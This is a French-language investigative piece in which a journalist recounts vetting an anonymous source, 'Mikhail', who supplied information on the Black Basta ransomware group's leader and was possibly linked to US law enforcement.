Moins de dix jours après cela, la veille de Noël, dans l’après-midi, Hakan Tanriverdi, de Paper Trail Media, m’appelle : il ne nous faut pas longtemps pour établir que nous avons été approchés par la même source.
Les doutes
Très vite, nous décidons de rester en contact étroit pour discuter des informations fournies par « Mikhail », et notamment valider leur cohérence de part et d’autre.
Pour cela, nous ouvrons un canal de communication partagé, sécurisé, aux messages éphémères. Nous ne sommes pas seuls dans ce groupe qui comptera 5 membres au final : j’ai notamment proposé que des spécialistes du renseignement humain (HUMINT) et de la cybercriminalité apportent leur regard. D’autres, de plusieurs régions du monde et en dehors de ce groupe, viendront également me prêter main-forte au fil de l’enquête.
Ces apports externes seront essentiels. Car très vite, des interrogations sur l’identité et les motivations de « Mikhail » ont émergé ; à juste titre, suggèrent les révélations de nos confrères du Monde, Florian Reynaud et Martin Untersinger.
Comme ils l’indiquent, « les deux reporters soupçonnent cependant [la source] d’être un faux-nez des autorités américaines : elle ne leur parlait qu’aux horaires de bureaux américains et utilisait du jargon juridique inhabituel pour un membre de la pègre russophone… »
Plus précisément, « Mikhail » ne m’a jamais écrit avant 13h45 heure de Paris. Sa plage horaire d’activité observable était loin de suggérer une localisation quelque part entre l’Europe centrale et l’Oural, mais bien plus sur la rive ouest de l’Atlantique.
Et il ne m’a jamais envoyé plus d’un mail par jour, comme s’il écrivait depuis un poste dont l’accès était restreint, au moins dans le temps. Les cybercriminels avec lesquels j’ai pu échanger (ou essayer) sont loin d’avoir ce profil : soit ils refusent de parler, soit ils s’avèrent extrêmement bavards, jusqu’à engager des conversations sur des sujets personnels.
« Mikhail » est en outre resté silencieux à Noël et au Nouvel An, comme s’il faisait une pause. Avant de reprendre langue le 2 janvier en souhaitant bonne année. Mais il était bien actif le 14 janvier… jour du Nouvel An orthodoxe. En pleine période durant laquelle de nombreux cybercriminels russophones sont en congé.
Enfin, il y a le vocabulaire et le style de langage utilisé par « Mikhail », bien plus marqués « forces de l’ordre » que « cybercriminels ».
Accélération
Fin janvier 2025, il a commencé à se faire pressant, semblant s’impatienter que je n’aie encore rien publié, et ne guère goûter certaines de mes questions. Le 20 février, il m’enverra son dernier mail. Une fuite majeure concernant Black Basta venait d’avoir lieu sur Telegram. « Mikhail » ne se contente pas de la relever : il me fournit un lien direct vers les données, hébergées sur Mega. Comme s’il tenait vraiment à ce que je mette la main dessus rapidement.
Déjà début janvier, que « Mikhail » soit effectivement un ex-Black Basta ou une gorge profonde, il apparaissait clair que l’enseigne était proche de partir en fumée. Un mois et demi plus tard, de nombreux éléments rendus publics permettaient de confirmer l’authenticité des données divulguées.
Reste que, avec notamment l’aide des experts sollicités et d’autres sources, il a été possible de confirmer la validité de ce qui avait été fourni par « Mikhail ». Et d’aller bien au-delà. Tout en découvrant, en fil de l’enquête, que l’identité réelle de « Tramp » avait été vraisemblablement établie bien avant cela et ne relevait guère plus que du secret de polichinelle.
Les révélations de nos confrères du Monde apportent un éclairage nouveau sur cette enquête, tout en confortant la méthode qui lui a été rigoureusement appliquée. Pour les fins connaisseurs sollicités alors, il n’est pas invraisemblable que « Mikhail » ait été lié aux forces de l’ordre américaines.
Pour l’un de ces experts, qui a accepté que je partage ici son analyse sous condition d’anonymat, « la source disposait d’informations et de renseignements uniques qui démontraient une compréhension approfondie d’Oleg/Tramp. Ce type d’informations ne peut être obtenu que lorsque l’on dispose des bonnes ressources ».
De nombreuses questions sans réponse
En outre, « la personne à l’origine de la fuite n’a jamais laissé transparaître ses émotions et est toujours restée concentrée sur le sujet. Cela correspond à la possibilité que cette personne ait été associée aux forces de l’ordre et ait intentionnellement cherché des journalistes à qui divulguer ces informations ».
Dès lors, la motivation de « Mikhail » était « très probablement de légitimer les renseignements provenant de sources ouvertes afin qu’ils puissent ensuite être utilisés à des fins d’intervention officielle ».
Cela n’en laisse pas moins de nombreuses questions sans réponse. Personnellement, celles qui retiennent le plus mon attention concernent ce qui s’est passé le 21 juin 2024, à Erevan, sur American Street où, selon la presse locale, Oleg Nefedov a été interpellé à 11h du matin.
Que faisait-il dans cette rue de la capitale arménienne, longeant la rivière Hrazdan, qui ne mène qu’à l’ambassade des États-Unis ? Qui pouvait bien en espérer son extradition d’un pays dont le contrôle aux frontières était encore alors assuré par les services… russes ? À un mois près.
À cela s’ajoute la question du choix des journalistes. Peut-être « Mikhail » a-t-il estimé que je serais susceptible d’accompagner et d’épauler un journaliste bien en vue sur son marché cible. Lequel aurait dès lors été l’Allemagne. Mais pour envoyer un message à qui ?